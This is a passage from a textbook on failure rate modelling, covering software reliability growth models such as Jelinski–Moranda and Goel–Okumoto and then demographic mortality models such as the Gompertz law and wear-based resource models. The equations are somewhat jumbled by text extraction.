N λ (t | H (t )) = ∑ λ ( N − i + 1) I ( si−1 ≤ t < si ), t ≥ 0 , (9.3) i ≥1 where H (t ) = 0 = s0 ≤ s1 < s2 < ... < sn (t ) is the observed history of failures in [0, t ) and S 0 = s0 = 0 . (t|H(t)) N N-1 N-2 N-3 0 s1 s2 s3 Figure 9.1. The CIF for the Jelinsky–Moranda model t 228 Failure Rate Modelling for Reliability and Risk As in Chapter 4, these formulas can be written in a compact way, i.e., ~ λt = λ ( N − N (t )) , λ (t | H (t )) = λ ( N − n~ (t )) , ~ where N (t ) denotes the random number of the last failure (debugging) before t and sn (t ) denotes the corresponding realization. A graph of the possible shape of λ (t | H (t ) is shown in Figure 9.1. The assumptions underlying the model of Jelinski and Moranda are clearly unrealistic: in reality all bugs do not contribute equally to the failure rate, but as one of the first models, it played a very important role in the development of software reliability. Note that some authors call the intensity process λt for software modelling the concatenated failure rate (see, e.g., Singpurwalla and Wilson, 1999; Ledoux, 2003). 9.2.2 The Moranda Model This is also one of the early models. The cycle durations are again distributed exponentially in this model, but it already takes into account the possibility of a different input of different bugs in software reliability. Moranda (1975) suggests a modification of the Jelinski–Moranda model, where the bugs that appear early contribute more to the failure rate than those that appear later. This seems to be a reasonable assumption as early bugs usually represent more serious faults of the program. There can be different ways of modelling this effect analytically. The simplest model is probably given by the corresponding geometrical reduction procedure (Moranda, 1975). (t|H(t)) 0 s1 s2 s3 Figure 9.2. The CIF for the Moranda model for k = 0.5 t Failure Rate of Software 229 The intensity process for this model is defined by the following equation: λt = ∑ λk i −1 I ( Si −1 ≤ t < S i ), t ≥ 0 , (9.4) i ≥1 where 0 < k < 1 . The exponentially decreasing function exp{−α (k − 1)} can also be used for this modelling: λt = ∑ λ exp{−α (i − 1)}I ( Si −1 ≤ t < Si ), t ≥ 0 . i ≥1 The additional parameter α > 0 provides more flexibility for the corresponding statistical inference. Figure 9.2 illustrates this model (compare with Figure 9.1). The important feature of the Moranda model is that there is no assumption on the initial number of bugs in the program. 9.2.3 The Schick and Wolverton Model This model considers non-exponential interfailure times, which is a significant departure from the previous two models. The intensity process is λt = ∑ λ ( N − i + 1)(t − S i−1 ) I ( Si −1 ≤ t < S i ), t ≥ 0 . (9.5) i ≥1 The failure rate at each cycle is proportional not only to the number of remaining bugs, as in the Jelinsky–Moranda model, but to the elapsed time (t − S i −1 ) as well. Therefore, the failure rate is linear at each cycle. (t|H(t)) 0 s1 s2 Figure 9.3. The CIF for the Schick and Wolverton model t 230 Failure Rate Modelling for Reliability and Risk The Weibull-type generalization can also be considered, i.e., λt = ∑ λ ( N − i + 1)α (t − S i−1 ) β I ( Si−1 ≤ t < Si ), t ≥ 0, α , β > 0 . i ≥1 On the other hand, the Moranda model (9.4) can be generalized in a similar way to λt = ∑ λk i −1 (t − S i −1 ) I ( S i −1 ≤ t < S i ), t ≥ 0 . i ≥1 9.2.4 Models Based on the Number of Failures The software reliability models of the previous section postulated the form of the corresponding intensity process. Models based on the number of failures usually postulate (explicitly or implicitly) the rate λr (t ) (Section 4.3.1) of the corresponding non-homogeneous Poisson process. Therefore, assume that the software failures occur in accordance with the NHHP with rate λr (t ) . If this function is decreasing, then the interarrival times are stochastically increasing with each debugging, and therefore this setting can be described by the reliability growth concept (Ushakov and Harrison, 1994). Obviously, the first choice for the decreasing rate λr (t ) is the decreasing power function, i.e., λr (t ) = at −b , a, b > 0 . (9.6) Some programs behave in such a way that the rate, at which failures are observed in software increases initially and then decreases. To accommodate this property, Goel (1985) suggested the following form of the rate: λr (t ) = abct c−1 exp{−bt c }, a, b, c > 0 . (9.7) On the other hand, Musa and Okumoto (1984) postulate the relationship between λr (t ) and the cumulative rate Λ r (t ) as λr (t ) = λ exp{−cΛ r (t )}, λ , c > 0 . (9.8) Thus, the rate at which failures occur exponentially decreases with the expected number of failures. This assumption seems reasonable from a ‘physical’ point of view. As Λ r (t ) is an integral of λr (t ) , solving the elementary differential equation results in the following explicit relationships: λr (t ) = Λ r (t ) = λ λct + 1 , 1 ln(λct + 1) . c (9.9) (9.10) Failure Rate of Software 231 As t → ∞ , Rate (9.9) converges to Rate (9.6) for b = 1, a = 1 / c . Another popular model is the model by Goel and Okumoto (1979). These authors argued that Λ r (t ) should be bounded, because the expected number of failures over the life of the software is finite (Singpurwalla and Wilson, 1999). Thus, they assume that lim r →∞ Λ r (t ) = a > 0 . Note that Λ r (t ) in (9.10) is not finite when t → ∞ . The crucial assumption in this model, however, is that the expected number of failures in [t , t + dt ) is proportional to the product of the expected number of remaining bugs in the software. Therefore, Λ r (t + dt ) − Λ r (t ) = b(a − Λ r (t ))dt + o(dt ) , (9.11) where b > 0 is the fault detection rate that shows the intensity with which the faults are removed. Therefore, another important restrictive assumption is that this rate is constant in time. Relationship (9.11) obviously results in a differential equation with respect to Λ r (t ) , i.e., Λ′r (t ) = b(a − Λ r (t )) . Taking into account the boundary conditions (Singpurwalla and Wilson. 1999), Λ r (t ) = a (1 − exp{−bt}), λr (t ) = ab exp{−bt} . (9.12) Thus, the asymptotic behaviour of Λ r (t ) is more realistic in the Goel and Okumoto model than the infinite limit obtained from Equation (9.10). The exponential decay in λr (t ) also seems to be more likely from general considerations than the more specific shape defined by Equation (9.9). In accordance with Equation (4.5), the intensity process for the NHPP is deterministic and equal to its rate λr (t ) , which can formally be written as λt = ∑ λr (t )I ( Si −1 ≤ t < S i ) ≡ λr (t ) . i ≥1 Most software reliability models are empirical and can be justified (or not) by fitting the failure data. The approach of the next section (Finkelstein, 1999c), by contrast, is theoretical and describes the operation of a program with bugs using some general (although simplified) probabilistic considerations. 9.3 Time-dependent Operational Profile 9.3.1 General Setting The definition of the operational profile p ( x ), x ∈ X ⊂ ℜ m was given earlier in Section 9.1. It is clear that the operational profile of software in real usage is timedependent, and therefore this should be taken into account in software reliability modelling. 232 Failure Rate Modelling for Reliability and Risk Similar to p(x ) , define p( x , t ) via the probability p( x , t )dx dt of choosing one input value in an infinitesimal domain ( x , x + dx ) × [t , t + dt ) . Therefore, p ( x, t ) is the density of the corresponding m -dimensional stochastic process. Let Pn = Pr[ N = n], n = 0,1,2,... be the distribution of the number of bugs in X . For each n , denote by Fn ( x1 f ,..., xn f ) the absolutely continuous joint distribution of the locations (coordinates) of n bugs defined in X ( n ) = X × X .... × X . Therefore, the corresponding joint density defines the following probability: f n ( x1 f , ,..., xn f )dx1 f ...dxn f = Pr[ X 1 f ∈ ( x1 f + dx1 f ),..., X n f ∈ ( xn f + dxn f )] , where X i f , i = 1,2,..., n are the random coordinates of the i th bug. We are now able to define the Yanoshi density (Daley and Vere-Jones, 1988) jn ( x1 f , ,..., xn f ) . The product jn ( x1 f , ,..., xn f )dx1 f ...dxn f is the probability that there are exactly n bugs, one in each infinitesimal domain xi f ∈ ( xi f + dxi f ) , i = 1,2,..., n . Thus, ~ jn ( x1 f , ,..., xn f ) = Pn f n ( x1 f , ,..., xn f ) , (9.13) where ~ f n ( x1 f , ,..., xn f ) = n! f n ( x1 f , ,..., xn f ) , as there are n! permutations of possible ‘positions’ of n bugs. Equation (9.1) can be generalized to the case of the time-dependent operational profile. Assume, first, that n is fixed and that the coordinates of all bugs, {x1 f ,..., xn f } , are also deterministic. Then C f (t , n, x1 f ,..., xn f ) = n ∫ p( x , t )dx = δ ∑ p( x b Xf if ,t) , (9.14) n =1 where δ b is a measure (volume), which, for simplicity, is the same for each bug. A finite computer representation of an m -dimensional vector owing to machine tolerance stands for an m -dimensional cube. Therefore, the Lebesgue integral in (9.14) is properly defined, and therefore the bug is activated by the corresponding input domain with a measure δ b . Relationship (9.14) should be understood asymptotically for sufficiently small δ b , which is obviously the case for software. The product C f (t , n, x1 f ,..., xn f )dt defines the probability of choosing a bug as an input value in [t , t + dt ) for fixed number of bugs and fixed (deterministic) coordinates. Therefore, C f (t , n, x1 f ,..., x n f ) in this setting can be considered (see the next paragraph) the pdf of the time to the first failure. As the number of bugs N and the coordinates { X 1 f ,..., X n f } are random, the corresponding integration should be performed. Thus, taking Equations (9.13) and (9.14) into account, the pdf of the time to the first failure of the software is ∞ f s (t ) = δ b ∑ n ∫∑ n =1 X n i =1 p( xi f , t ) jn ( x1 f , ,..., xn f ) dx1 f ,..., dxn f (9.15) Failure Rate of Software 233 and, as usual, the corresponding failure rate is defined as λs (t ) = f s (t ) ∞ . (9.16) ∫ f (u)du s t We are interested in the time to the first failure of the software. The operational profile, however, defines the probability p( x , t )dx dt of choosing a bug that does not take into account the fact that this should be the first bug chosen in [0, t + dt ) . Therefore, strictly speaking, the corresponding conditional operational profile should substitute p( x , t ) in Equation (9.15). As the total volume of ‘faulty inputs’ is usually much smaller than the entire volume of X , the impact of this substitution is negligible (Finkelstein, 1999c). With this in mind, we can proceed with the operational profile p( x , t ) . Equations (9.15) and (9.16) describe a general model and additional simplifying assumptions should be imposed for using this model in practice. On the other hand, an alternative approach can be used assuming that the bugs are distributed in X in accordance with the m -dimensional spatial Poisson process. This approach is similar to the spatial survival model of Section 8.3, which was considered for m=2. Denote by λr (x ) the rate of the m -dimensional spatial Poisson process defined similar to (8.30). Assume that this rate, which describes the ‘density’ of bugs in X , is given. Then the failure rate λs (t ) can be constructed directly by generalizing the 2-dimensional approach of Section 8.3 and using the straightforward heuristic reasoning (Finkelstein, 1999c). Therefore, λs (t ) = δ b ∫ λr ( x ) p( x , t )dx[1 + o(1)] . (9.17) X Indeed, λr ( x )δ b [1 + o(1)], δ b → 0 is the probability that the input value chosen by the operational profile p( x , t ) in [t , t + dt ) belongs to the bug’s area. Another source of approximation is that we assume that a bug was not chosen by the operational profile in [0, t ) . 9.3.2 Special Cases Example 9.1 Let the operational profile be uniform in space and time, i.e., p( x , t ) = p . Then Equation (9.17) becomes λs (t ) = pδ b ∫ λr ( x )dx = pδ δ E[ N ] , (9.18) X which is a generalization of the Jelinsky–Moranda model to the case of a random number of bugs in a program. After the first debugging, the expected number of 234 Failure Rate Modelling for Reliability and Risk remaining bugs is E[ N ] − 1 , etc. Denote pδ b = λ . Then the corresponding intensity process can be defined similar to Equation (9.2) as λt = [ E [ N ]] ∑ λ ( E[ N ] − i + 1) I (S i −1 ≤ t < Si ), t ≥ 0 , i ≥1 where the upper index of summation is the integer part of E[ N ] . Example 9.2 Let the input domain X be one-dimensional, i.e., X ⊂ [0, ∞) . It can be considered as a long ‘line’ of code. Assume that a program chooses inputs consequently (starting with x = 0 ) moving in one direction. This resembles a process of proofreading in a publishing house. The encountered bug is removed, but the ‘reading’ starts from the very beginning again (the program restarts, which is often the case in practice). Our interest is in obtaining the expected number of removed bugs in [0, t ) for sufficiently large t . This setting is different from the usual renewal-type approach, as the cycles in this process are not identically distributed and not independent (see later). To proceed, some additional assumptions should be made. Assume that a program starts operating at t = 0 and the inputs are ‘read’ at a constant speed in time, i.e., ν (t ) = ν . Therefore, the corresponding operational profile is ⎧1, x = νt , p ( x, t ) = ⎨ ⎩0, x ≠ νt. (9.19) Denote by Fi (t ) , i = 1,2,... the Cdf of the i th cycle duration and assume that the distances between the consecutive bugs in a program are i.i.d. random variables. Therefore, an operational profile with a constant speed means that the times between consecutive debugging without restart of the program are identically distributed with the Cdf F (t ) = F1 (t ) , which is a renewal process. For the operation of the program with restart, however, the Cdf of the time to the second bug is the convolution F (1+2) (t ) , F (1) (t ) ≡ F (t ) ; the Cdf of the time to the third bug is F (1+ 2+3) (t ) , etc. Therefore, the time to the n th failure has the following distribution: ⎛ n ( n +1) ⎞ ⎜ ⎟ 2 ⎠ Ln (t ) = F (1+ 2+...+n ) (t ) = F ⎝ (t ) . (9.20) Specifically, when F (t ) = 1 − exp{−λt} , Ln (t ) = 1 − exp{−λt} n ( n +1) −1 2 ∑ i =0 (λ t ) i . i! Equation (9.20), in fact, employs another simplifying assumption that all ‘elementary durations’ in the convolutions are independent, whereas in reality, e.g ., the Cdf of the second cycle is not F (1+ 2 ) (t ) = F (3) (t ) but is defined by the duration, which is a sum of three terms. The first term has the Cdf F (t ) ; the second term Failure Rate of Software 235 has exactly the same duration as the first one and is therefore dependent; the third term has again an independent duration with the Cdf F (t ) . Denote, as usual, by N (t ) the number of renewals in an ordinary renewal process with the underlying Cdf F (t ) and by N b (t ) the number of removed bugs in [0, t ) in the described model. It follows from (9.20) that N b (t ) can be obtained from the following stochastic equation: N b (t )( N b (t ) + 1) = N (t ) . 2 (9.21) When N b (t ) >> 1 (although we can proceed without this simplifying assumption), N b (t ) = 2 N (t ) . (9.22) Applying the operation of mathematical expectation to both sides of this equation gives [ ] E[ N b (t )] = E 2 N (t ) . (9.23) Although Jensen’s inequality cannot be applied to the right-hand side of Equation (9.23), as the square root function is concave, it can be shown using the considerations at the end of Section 4.3.2 that, as t → ∞ , the operations of expectation and of the square root can be interchanged in the following sense: [ ] E 2 N (t ) = 2 H (t ) [1 + o(1)] , where E[ N (t )] ≡ H (t ) is the renewal function for the ordinary renewal process with the governing Cdf F (t ) . 9.4 Chapter Summary The aim of this chapter is similar to that of the previous one, i.e., to present some examples of direct failure rate modelling. Most of the initial software reliability models were formulated in the literature in terms of the corresponding failure rates. Therefore, the intensity process approach of Chapter 4 can be illustrated by these models. The major difficulty in assessing software reliability is that we are dealing primarily with design faults, which is a very different situation from that considered by conventional hardware reliability theory. There are two major causes of randomness in software reliability models: the unknown ‘coordinates’ of bugs in software and the random nature of input values. Neither of them is easy to model. Stochastic modelling, which takes into account a combination of these sources, can be used, in principle; however, in order to result in something useful in practice, many assumptions should be made. Note that most of the models considered in the literature are based on very strong assumptions. 236 Failure Rate Modelling for Reliability and Risk In Section 9.4 we describe our model (Finkelstein, 1999c), which is based on the concepts of a spatial point process of bugs and an operational profile of software. The combination of these concepts results in a general model for the failure rate of software. If, for example, the operational profile is uniform (homogeneous) in space and time, then this model reduces to the well-known Jelinsky–Moranda model. 10 Demographic and Biological Applications 10.1 Introduction Up to now, we have implicitly assumed that the lifetimes under consideration are mostly those of engineering (technical) items. Statistical reliability theory usually deals with methods of statistical inference based on lifetime data that describe performance of technical objects. The corresponding distribution functions, parameters of distributions, failure rates and other relevant characteristics are estimated on the basis of available observations (failure times, censored operation intervals, etc.). Similar methods are developed in survival analysis and are usually implemented in medical applications. On the other hand, reliability theory possesses the well-developed ‘machinery’ for stochastic modelling of ageing (deterioration) that eventually leads to failures of technical objects. These methods can be successfully applied to lifespan modelling of humans and other organisms. Thus, not only the final event (e.g., death) can be considered, but the process that results in this event as well. Several simple reliability-based stochastic approaches to the corresponding modelling will be described in what follows. In this chapter, we will not restrict ourselves to discussing the properties of failure (mortality) rates but consider the topic from a broader viewpoint. Note that here we are looking only at some relevant simple models and applications that reflect the research interests of the author in this area and could be helpful to the reader as a source for initial reading. According to Birren and Renner (1977) “ageing refers to the regular changes that occur in mature genetically representative organisms living under representative environmental conditions as they advance in the chronological age”. This definition is meaningful: it emphasizes ageing as a developmental process, specifies the period of maturity through senescence and states that the corresponding sample should be representative. It also focuses on the impact of environment on the ageing process. The literature on numerous biological theories of ageing is extensive. Various stochastic mortality models are reviewed, for example, in Yashin et al. (2000). Most authors agree that the nature of ageing (and, therefore, of death) is associated with “biological wearing” or “wear and tear”. Reliability theory possesses welldeveloped tools for modelling wear in technical systems, and therefore it is natural 238 Failure Rate Modelling for Reliability and Risk to apply this technique to biological ageing (Finkelstein, 2005c). Since even the simplest organisms are much more complex than technical systems that are usually considered in reliability analysis, these analogies should not be interpreted too literally and should be regarded as some useful modelling tools. Note that populations of biological organisms, unlike populations of technical devices, evolve in accordance with evolutionary theory. Various maintenance and repair problems have been intensively studied in reliability theory. The obtained results can definitely be used for modelling mechanisms of maintenance and repair in organisms. However, the notion of reproduction, which is crucial for bio-demography, has not been considered, although notions like stochastic birth and death processes can certainly be useful for the corresponding modelling. Evolutionary theories (Kirkwood, 1997) tend towards a rather controversial view in that all damage, in principle, is repairable and that natural selection can shape the lifetime trajectory of damage and repair, constrained only by the physical limitations of available resources (Steinsaltz and Goldwasser, 2006). However, not all damage in organisms can be reversed: for example, damage to the central nervous system and heart tissue is usually irreversible. In any case, the importance of different repair mechanisms for the survival of organisms is evident, which brings into play stochastic modelling of all ‘types’ of repair, i.e., perfect, minimal and imperfect repair actions. This topic has been partially studied in reliability theory (Chapter 5), but there are still many open problems. The future general theory of ageing will probably be built on the basis of unified biological theories that will use stochastic reliability approaches as an important analytical tool. An interesting discussion on general “quality management” of organisms and the pros and cons of exploiting the existing reliability approaches for biological ageing can be found in Steinsaltz and Goldwasser (2006). On the other hand, the mathematical details useful for modelling are discussed in Steinsaltz and Evans (2004). Vaupel’s (2003) conjecture that “after reproduction ceases, the remaining trajectory of life is determined by forces of wear, tear and repair acting on the momentum produced by the Darwinian forces operating earlier in life” resulted in the reliability modelling of Finkelstein and Vaupel (2006). These authors state: “As the force of natural selection diminishes with age, structural reliability concepts can be profitably used in mortality analysis. It means that the design of the structure is more or less fixed at this stage and reliability laws govern its evolution in time. However, it does not mean that these concepts cannot be used for mortality modelling at earlier ages, but in this case they should be combined with the laws of natural selection.” In accordance with a conventional definition, the reliability of a technical object is the probability of performing a designed function under given conditions and in a given interval of time (Rausand and Hoyland, 2004). This definition can be applied for a probabilistic description of a lifespan T of an organisms, where the designed function is understood as being alive. In accordance with Equations (2.31) and (2.32), the main demographic model for the lifetime of humans is the Gompertz (1825) law of mortality, defined by the exponentially increasing mortality rate μ (t ) , i.e., μ (t ) = a exp{bt} , a > 0, b > 0 (10.1) Demographic and Biological Applications 239 and the corresponding distribution function is ⎧ a ⎫ F (t ) = Pr(T ≤ t ) = 1 − exp⎨− [exp{bt} − 1]⎬ . ⎩ b ⎭ (10.2) In accordance with the conventional notation for demographic literature, the mortality rate (force of mortality), which is equivalent to the failure rate in reliability, is denoted by μ (t ) . The Gompertz law has been the main demographic model of human mortality for nearly 200 years. A reasonably good fit (excluding the periods of infant mortality and adolescence) is achieved for numerous human mortality data sets of different countries. A number of attempts were made in the past to justify the exponential form of this empirical model for the human mortality rate by some biological mechanism, but most of these approaches exploited additional assumptions, either explicitly or implicitly equivalent to the desired exponentiality (e.g., Strehler and Mildvan, 1960; Witten, 1985; Koltover, 1997; Gavrilov and Gavrilova, 2001). Gompertz (1825) gave the following mathematical explanation of his formula. He had assumed that the ability to “resist death” is an inverse function to the mortality rate μ (t ) , i.e., 1 / μ (t ) . Furthermore, another assumption stated that the change in this ability is proportional to its value. These assumptions can be described mathematically as ⎛ 1 ⎞ 1 ⎟⎟ = −b d ⎜⎜ dt . μ (t ) ⎝ μ (t ) ⎠ This relationship is equivalent to the following elementary differential equation: dμ (t ) = bμ (t ) dt with the initial condition μ (0) = a . Therefore, the solution to this equation is given by Equation (10.1). There can be other popular mortality curves in demographic practice that can fit empirical data. The power law for μ (t ) is also sometimes used in the literature. Another modification is the Makeham (1860) law of mortality, which adds a constant term A to the Gompertz curve (10.1), i.e., μ (t ) = A + a exp{bt} . The constant term is believed to account for the so-called baseline mortality, which does not depend on age and usually models ‘natural hazards’, although many authors do not agree with this explanation. Makeham (1890) derived a mathematical justification of this curve using the corresponding second-order differential equation with respect to μ (t ) (Marshall and Olkin, 2007). Living organisms reproduce themselves, and this is a crucial distinction between population studies and reliability-based reasoning. Populations of organisms evolve in time, and a special discipline called ‘population dynamics’, based on 240 Failure Rate Modelling for Reliability and Risk methods of specific stochastic processes, deals with this phenomenon. However, mortality rates and some other characteristics can be studied without relying on the methods of population dynamics. We now turn to the statistical definition of the mortality rate for populations of individuals. As in Section 2.1 (see Equation (2.6)), consider a cohort of N individuals born at t = 0 and denote by N (t ) the number of those who are alive at time t . Note that, in demography, a cohort is a group of individuals born in the same period of time, generally the same calendar year. Therefore, Definition 2.1 for the failure (mortality) rate holds, and Equation (2.6) in a new notation reads: μ (t ) = lim Δt →0 N (t + Δt ) − N (t ) , N (t ) → ∞ . N (t )Δt (10.3) Cohort measures, describing lifetime random variables, are easily and unambiguously obtained using standard statistical tools. The procedures are the same for engineering and biological items. In the case of humans, however, one must wait approximately 100 years in order for cohort data to be complete. Therefore, many cohort mortality experiments are performed with organisms having short life spans (e.g., medflies, worms and mice). On the other hand, human mortality data sets are usually presented not as cohort data sets but as so-called period data sets. The reason for this is that mortality characteristics change with calendar (chronological) time. Therefore, in addition to the age of an object x (previously denoted by t ) , we must also consider the calendar time t . The term period means that the data (the number of deaths and the number of survived individuals at each age) are collected for the time period [t , t + Δt ) . Sometimes these data are called cross-sectional to emphasise the importance of the calendar variable t . Let, for instance, the numbers of living individuals of ages 0,1,2,... in some population be recorded for 1 January 2000 and the corresponding numbers for each age of those who died in [2000,2001] also be stated. The data are usually organized in the form of life tables, which for some European countries have been in existence already for hundreds of years. In its most basic form, a period life table is a listing of ages and the corresponding probabilities of death within the next year. Denote by N ( x, t ) an age-specific population size at time t : the number of individuals of age x . See Keding (1990) and Arthur and Vaupel (1984) for discussion of this quantity. We will call N ( x, t ), x ≥ 0 the population age structure at time t . Alternatively, N ( x, t ) is often called the population density (Finkelstein, 2005a). Let Δt be our period. Note that in demography the period is usually equal to one year and N ( x, t ) is also usually defined as the number of individuals whose age at time t is [x] , but other units of time can also be used. Similar to (10.3), define the mortality rate for a population with the age structure N ( x, t ), x ≥ 0 as a function of age and time as μ ( x, t ) = lim Δt →0 N ( x + Δt , t + Δt ) − N ( x, t ) , N ( x, t ) → ∞ . N ( x, t )Δt (10.4) Using these definitions, mortality rates and survival probabilities can be estimated from the data. What is the difference between Equations (10.3) and (10.4)? Demographic and Biological Applications 241 Imagine that a population is stationary, i.e., the age structure does not depend on the calendar time t . In this case N ( x, t ) ≡ N ( x) and both definitions coincide. The assumption of stationarity, however, is very unrealistic for human populations. Owing to healthcare achievements, improvements in a lifestyle and a decrease in natural hazards (at least in the developed countries), life expectancy is constantly increasing. Oeppen and Vaupel (2002) state, for instance, that female life expectancy in the country with maximum life expectancy (Japan) is increasing every year by approximately 3 months. This trend has been observed already for more than 50 years. Therefore, human populations are definitely non-stationary, and the second argument in μ ( x, t ) captures this phenomenon. Note that, owing to exponential representation (2.5), the univariate mortality rate μ (x) uniquely defines the corresponding Cdf and, therefore, completely characterizes the lifetime random variable T . Unlike this cohort setting, the lifetime random variable for the period setting cannot be unambiguously defined only via μ ( x, t ) without additional simplifying assumptions. This is the main complication, which should be taken into account when analysing mortality data. However, most of the practical demographic methods pay no attention to this important phenomenon. We will consider this topic in more detail in Section 10.6. Let X t denote a random age at time t of an individual chosen at random (with equal chances) from a population of size ∞ N (t ) = ∫ N (u, t )du . 0 Therefore, we interpret X t as a random age in a population with an age structure N ( x, t ), x ≥ 0 . Let f ( x, t ) = N ( x, t ) ∞ (10.5) ∫ N ( x, t )dx 0 and x F ( x, t ) = Pr[ X t ≤ x] = ∫ N (u, t )du 0 ∞ (10.6) ∫ N (u, t )du 0 be the pdf and the Cdf of X t , respectively. The latter can be equivalently interpreted as the proportion of individuals in our population whose age does not exceed x . It is obvious that the described notion of a random age is relevant only for a period setting, as we count ‘lives’ in a period [t , t + Δt ) for different ages. In the cohort setting, however, the age of all individuals is the same. Remark 10.1 Equations (10.5) and (10.6) define, in fact, the estimates of the pdf and the Cdf, respectively (observed period values). In order to avoid possible confusion, we assume as in (10.3) and (10.4) that the population size tends to infinity. 242 Failure Rate Modelling for Reliability and Risk Remark 10.2 When a population is stationary, Equation (10.6) becomes x Pr[ X ≤ x] = ∫ N (u)du 0 ∞ , ∫ N (u)du 0 where Pr[ X ≤ x] is the probability that the age (and not the age at death, as when defining the ‘usual’ cohort Cdf of a lifetime random variable) of an individual is less than or equal to x . Note that, as a population is stationary in this example, the cohort and the period settings can be considered equivalent. The corresponding probability density function is defined by d Pr[ X ≤ x] = dx N ( x) ∞ . ∫ N (u)du 0 We will continue with further studies of mortality in the non-stationary populations in Section 10.6, but first we will discuss several models of mortality and ageing that can be described in terms of a usual cohort setting. 10.2 Unobserved Overall Resource Following Finkelstein (2003b), we assume that an organism at birth ( t = 0 ) acquires an overall unobserved random resource R , described by the Cdf F0 (r ) i.e., F0 (r ) = Pr[ R ≤ r ] and the corresponding mortality (failure) rate μ 0 (r ) . We also assume that the process of an organism’s ageing is described by an increasing, differentiable and deterministic (for simplicity) cumulative function W (t ) ( W (0) = 0 ) to be called wear. The wear increment in [t , t + dt ) is defined as w(t ) + o(dt ) . Additionally, let W (t ) → ∞ as t → ∞ . Under these assumptions, we formally arrive at the accelerated life model (see also Section 5.2.1 and Chapter 6), i.e., Pr[T ≤ t ] ≡ F (t ) = F0 (W (t )) ≡ Pr[ R ≤ W (t )] , (10.7) where t W (t ) = ∫ w(u )du; w(t ) > 0, t ∈ [0, ∞) . 0 The corresponding mortality rate f (t ) / F (t ) is obtained from (10.7) as μ (t ) = w(t ) μ 0 (W (t )) . (10.8) Demographic and Biological Applications 243 These formulas are similar to Equations (5.1) and (5.2) of Chapter 5, but we obtain them now in a different way. Note that death (failure) occurs when the wear W (t ) reaches the boundary R . Substitution of the deterministic wear W (t ) in (10.7) by the increasing stochastic process Wt , t ≥ 0 leads to the following general relationship (Finkelstein, 2003b): F (t ) = Pr[T ≤ t ] = Pr[ R ≤ Wt ] = E[ F0 (Wt )] , (10.9) where the expectation is obtained with respect to Wt , t ≥ 0 . As the mortality rate is a conditional characteristic, it cannot be obtained from (10.8) as a simple expectation: μ (t ) = E[ wt μ0 (Wt )] and, similar to Equations (3.5) and (3.6), the corresponding conditioning should be performed, i.e., μ (t ) = E[ wt μ0 (Wt ) | T > t ] , (10.10) where wt denotes the stochastic rate of diffusion: dWt ≡ wt dt . A good candidate for Wt , t ≥ 0 is the standardized gamma process, which, according to Definition 5.9, has stationary independent increments and Wt − Ws ( t > s ) has a gamma density with scale parameter 1 and shape parameter (t − s ) . The Wiener process with drift can also sometimes be used for modelling, although its realizations are not monotone. An assumption of ‘strict’ monotonicity is usually natural for the modelling of wear. This process is defined (Ross, 1996) in the following way. Definition 10.1. The Wiener process (Brownian motion) with drift is the stochastic process Wt , t ≥ 0 , W0 = 0 , with stationary independent increments. Its values at ∀t > 0 are normally distributed with mean at ( a is a drift coefficient) and variance t . The wear in [t , t + h) can also be defined in a natural way as the following increment (Lemoine and Wenocur, 1985; Wenocur, 1989; Singpurwalla, 1995): Wt + Δt − Wt = a(Wt )ε (Δt ) + b(Wt )Δt , ∀t ∈ [0, ∞) , (10.11) where ε (Δt ) is a random variable with a positive support and finite first two moments and a(⋅) and b(⋅) are continuous positive functions of their arguments. Letting Δt → 0 , we arrive at the continuous version of (10.11) in the form of Ito’s stochastic differential equation (Singpurwalla, 1995), i.e., dWt = a(Wt )dη t + b(Wt )dt , where ηt , t ≥ 0 is, for example, a gamma process if ε (Δt ) has a gamma density with scale parameter 1 and shape parameter Δt . Integrating this equation with the initial condition W0 = 0 results in t t 0 0 Wt (t ) = ∫ a(Wu )dη (u ) + ∫ b(Wu )du . (10.12) 244 Failure Rate Modelling for Reliability and Risk The following two examples are really meaningful and probably deserve to be presented in separate sections. Example 10.1 As a specific case of an unobserved resource model, consider now a discrete resource R = N with the Cdf F0 (n) ≡ P ( N ≤ n) . The following simple reliability interpretation is meaningful. Let N be the random number of initially (at t = 0 ) operating independent and identically distributed components with constant failure rates λ . Assume that these components form a parallel system, which, according to Gavrilov and Gavrilova (2001), models the lifetime of an organism (generalization to the series-parallel structure is straightforward). In each realization N = n, n ≥ 1 , our degradation process of pure death Wt , t ≥ 0 in this setting is just the number of failed components. When this number reaches n , the death of an organism occurs. The transition rates of the corresponding Markov chain are nλ , (n − 1)λ , (n − 2)λ , etc. Denote by μ n (t ) the mortality rate, which describes Tn –the time to death for the fixed N = n, n = 1,2,... ( n = 0 is excluded, as there should be at least one operating component at t = 0 ). It is shown in Gavrilov and Gavrilova (2001) that as t → 0 , this mortality rate tends to an increasing power function (the Weibull law), which is a remarkable fact. On the other hand, for random N , similar to (10.9), the mortality rate is given as the following conditional expectation with respect to N : μ (t ) = E[ μ N (t ) | T > t ] . (10.13) Therefore, similar to the continuous case, μ (t ) is a conditional expectation (on the condition that the system is operable at t ) of a random mortality rate μ N (t ) . Note that, for small t , this operation can approximately result in the unconditional expectation ∞ μ (t ) ≈ E[ μ N (t )] = ∑ Pn μ n (t ) , (10.14) n =1 where Pn ≡ Pr[ N = n] , but the limiting transition, as t → 0 , should be performed carefully in this case. As t → ∞ , we observe the following mortality plateau (Finkelstein and Vaupel, 2006): μ (t ) → λ . (10.15) This is due to the fact that the conditional probability that only one component with the failure rate λ is operating tends to 1 as t → ∞ (on the condition that the system is operating). Assume now that N is Poisson distributed with parameter η . Taking into account that the system should be operating at t = 0 , Pn = exp{−η }η n , n = 1,2,... . n!(1 − exp{−η}) Demographic and Biological Applications 245 It can be shown via direct integration and using the discrete versions of Equations (3.4)–(3-6) that the time to death in our simplified model has the following Cdf (Steinsaltz and Evans, 2004): F (t ) = Pr[T ≤ t ] = 1 − exp{−η exp{−λt}} . 1 − exp{−η} (10.16) The corresponding mortality rate is μ (t ) = F ′(t ) ηλ exp{−λt} . = 1 − F (t ) exp{η exp{−λt}} − 1 (10.17) Performing, as t → ∞ , the limiting transition in (10.17), we also arrive at the mortality plateau (10.15). In fact, the mortality rate given by Equation (10.17) is far from the exponentially increasing Gompertz law (10.1). The Gompertz law can erroneously follow from Approximation (10.14) if this approximation is used formally, without considering a proper conditioning in (10.13), as in Gavrilov and Gavrilova (2001). The relevant discussion can be found in Steinsaltz and Evans (2004). Example 10.2 We will now combine the resource model (10.7)–(10-9) with the shock model of Section 8.1. We assume that the i th shock causes our system’s failure with probability θ (t ) , and with the complementary probability 1 − θ (t ) it only increases the accumulated wear by a random amount Wi . Assume that these random variables are i.i.d. ( Wi = W , i = 1,2,... ) and that they are characterized by the density f (w) and the moment generating function M W (t ) , i.e., ∞ M W (t ) = E[exp{tWi }] = ∫ 